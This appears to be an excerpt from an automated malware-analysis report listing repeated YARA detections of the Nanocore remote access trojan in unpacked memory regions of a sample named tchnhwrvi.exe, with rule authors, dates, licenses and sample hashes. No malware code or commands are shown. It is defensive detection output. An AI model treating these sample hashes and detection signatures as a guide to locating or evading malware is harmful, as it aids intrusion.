      Source: 2.2.tchnhwrvi.exe.7660000.45.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7660000.45.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7660000.45.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75c0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75c0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75c0000.37.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75c0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4f8cc52.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4f8cc52.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4f8cc52.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4f91a88.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f91a88.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f91a88.22.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4f91a88.22.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.43c0fef.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43c0fef.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43c0fef.16.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.43c0fef.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.7610000.41.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7610000.41.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7610000.41.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7610000.41.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.5df0000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5df0000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5df0000.31.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.5df0000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.3404f78.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3404f78.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.3404f78.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.3404f78.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.441b408.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.441b408.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.441b408.27.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.441b408.27.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75e0000.39.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75e0000.39.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75e0000.39.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75e0000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4f91a88.22.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4f91a88.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4f91a88.22.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.34257fc.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.34257fc.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.34257fc.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.34257fc.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.7620000.43.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7620000.43.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7620000.43.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7620000.43.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7620000.43.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7620000.43.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.762e8a4.44.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.762e8a4.44.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.762e8a4.44.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.762e8a4.44.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
